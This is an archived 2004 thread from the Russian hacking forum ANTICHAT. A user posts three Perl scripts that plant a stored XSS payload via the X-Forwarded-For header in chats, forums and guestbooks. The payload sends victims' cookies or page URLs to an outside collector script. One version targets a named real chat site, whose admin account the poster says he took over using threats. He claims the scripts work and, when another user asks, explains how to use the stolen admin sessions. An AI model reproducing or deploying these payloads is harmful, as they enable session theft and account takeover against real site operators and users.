ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
14.08.2004, 14:46
|
|
Участник форума
Регистрация: 11.06.2004
Сообщений: 266
Провел на форуме:
15191
Репутация:
13
|
|
Кароче вот написал себе снифер...
Главная работа заключается в том если форум,гостевая,чат получает айпи через прокси (X_FORVARED_FOR) при отсылке нашего сообщения или ника, получаем КУКИ журтвы или Его сэссию
1-версия получаем куки
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td> Исходный код </td></tr><tr><td id="CODE">
#!/usr/bin/perl
print "Content-type: text/html\n\n";
use Socket;
$host="ХОСТ_СЕРВЕРА";
$port="80";
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
$iaddr = inet_aton($host);
$paddr = sockaddr_in($port, $iaddr);
connect(SOCK, $paddr);
send (SOCK, "GET СЮДА_ВСТАВЛЯЕМ_ВХОД_НАЕШЛН КА_ПОЛНЫЙ_ПУТЬ_ИЛИ_ОТСЫЛКУ САМОГО_СООБЩЕНИЯ HTTP/1.0\nREFERER: СЮДА ВСТАВЛЯЕМ_ПУТЬ_К_ИСПОЛНЯЕМ МУ_СКРИПТУ(например_http://forum.antichat.ru/cgi-bin/ikonboard.cgi\nX_FORWARDED_FOR: <script>a='url(\"http://seechat.fatal.ru/frik/good.php?'+document.cookie+'\")';document.all.tags ('font')[0].style.backgroundImage=a;</script> СЮДА_НАШ_ПРОКСИ_ИП(МОЖНО_ЛЮ ОЙ,он будит виден админам...можно типа(АДМИНЫ_КОЗЛЫ)\nHost: http://$host\n\n", 0);
print "\n";
print "Status:\n";
print <SOCK>;
close(SOCK);
print("$i\n");
<>;
[/QUOTE]<span id='postcolor'>
2 верси, получаем сэссии админов
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td> Исходный код </td></tr><tr><td id="CODE">
#!/usr/bin/perl
print "Content-type: text/html\n\n";
use Socket;
$host="ХОСТ_СЕРВЕРА";
$port="80";
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
$iaddr = inet_aton($host);
$paddr = sockaddr_in($port, $iaddr);
connect(SOCK, $paddr);
send (SOCK, "GET СЮДА_ВСТАВЛЯЕМ_ВХОД_НАЕШЛН КА_ПОЛНЫЙ_ПУТЬ_ИЛИ_ОТСЫЛКУ САМОГО_СООБЩЕНИЯ HTTP/1.0\nREFERER: СЮДА ВСТАВЛЯЕМ_ПУТЬ_К_ИСПОЛНЯЕМ МУ_СКРИПТУ(например_http://forum.antichat.ru/cgi-bin/ikonboard.cgi\nX_FORWARDED_FOR: <script>a='url(\"http://seechat.fatal.ru/frik/good.php?'+location.href+'\")';document.all.tags(' font')[0].style.backgroundImage=a;</script> СЮДА_НАШ_ПРОКСИ_ИП(МОЖНО_ЛЮ ОЙ,он будит виден админам...можно типа(АДМИНЫ_КОЗЛЫ)\nHost: http://$host\n\n", 0);
print "\n";
print "Status:\n";
print <SOCK>;
close(SOCK);
print("$i\n");
<>;
[/QUOTE]<span id='postcolor'>
Как заметно в первой версии получаем через document.cookie
во второй через location.href
http://seechat.fatal.ru/frik/good.php? - этот скрипт обрабатывает отсылку первого скрипта... если так и войти на неё то в броузере ничего не покажется а ваш ИП попадёт в него!!!
Просматреть его можно по ссылке
http://seechat.fatal.ru/frik/good.php?pass=123321 |
|
|
14.08.2004, 14:49
|
|
Участник форума
Регистрация: 11.06.2004
Сообщений: 266
Провел на форуме:
15191
Репутация:
13
|
|
Скрипт рабочий, тэстировался на многих чатах и форумах!!! РАБОТАЕТ!
|
|
|
|
14.08.2004, 15:30
|
|
Seo Pozitive
Регистрация: 13.08.2004
Сообщений: 779
Провел на форуме:
5581277
Репутация:
1635
|
|
Объясни пожалуйста по-подробней как пользоваться, желатель с примером  |
|
|
|
14.08.2004, 17:22
|
|
Участник форума
Регистрация: 11.06.2004
Сообщений: 266
Провел на форуме:
15191
Репутация:
13
|
|
вообщемт вот я ломал чат www.chat.f-1.ru
я там стал главным админом... но разными *** угрозами, а попалился я там конкретно пришлось его покинуть, но дыры эти так же и остались... смысл таког (для чата) если сидит админ в чате то (если чесно то непомню через куки или через локатионс он работает проверь и так и так...
если через локатион то проблем нет получай на http://seechat.fatal.ru/good.php?pass=123321 локатионс жертвы и творишь что хочешь!!! аналогично и другим чатам... в форумаххх и гостевых всё попроще
если конечно тот чат через куки а как такого он помоему и через куки и работает то ты получишь на сеечате КУКИсы админов... ну а дальше уже работа идёт с кукисами используй приведённые здесь программы... из статьи че гевары... но не знаею работает ли она или нет пробовать ещё не удавалось...с подменой куков... я пользуюсь своим методом... он немного по тяжелей но это не проблема... вот собственно построенный файл получения админов кук из того чата, если как такого они там находятса...
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td> Исходный код </td></tr><tr><td id="CODE">
#!/usr/bin/perl
print "Content-type: text/html\n\n";
use Socket;
$host=" www.chat.f-1.ru;
$port="80";
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
$iaddr = inet_aton($host);
$paddr = sockaddr_in($port, $iaddr);
connect(SOCK, $paddr);
send(SOCK, "GET http://www.chat.f-1.ru/cgi/chat.pl?cf=login&mode=reg&username=testPRG HTTP/1.1\nREFERER: http://www.chat.f-1.ru/cgi/chat.pl\nX_FORWARDED_FOR: <script>a='url(\"http://seechat.fatal.ru/frik/good.php?'+document.cookie+'\")';document.all.tags ('font')[0].style.backgroundImage=a;</script> 0.0.0.0\nHost: http://www.chat.f-1.ru\n\n", 0);
print "\n";
print "Status:\n";
print <SOCK>;
close(SOCK);
print("$i\n");
<>;
[/QUOTE]<span id='postcolor'>
ТОесть юзай что не получитса пиши в асю... хотя фсё должно работать!!!
<span style='color:GREEN'>MY ICQ 404035</span> |
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
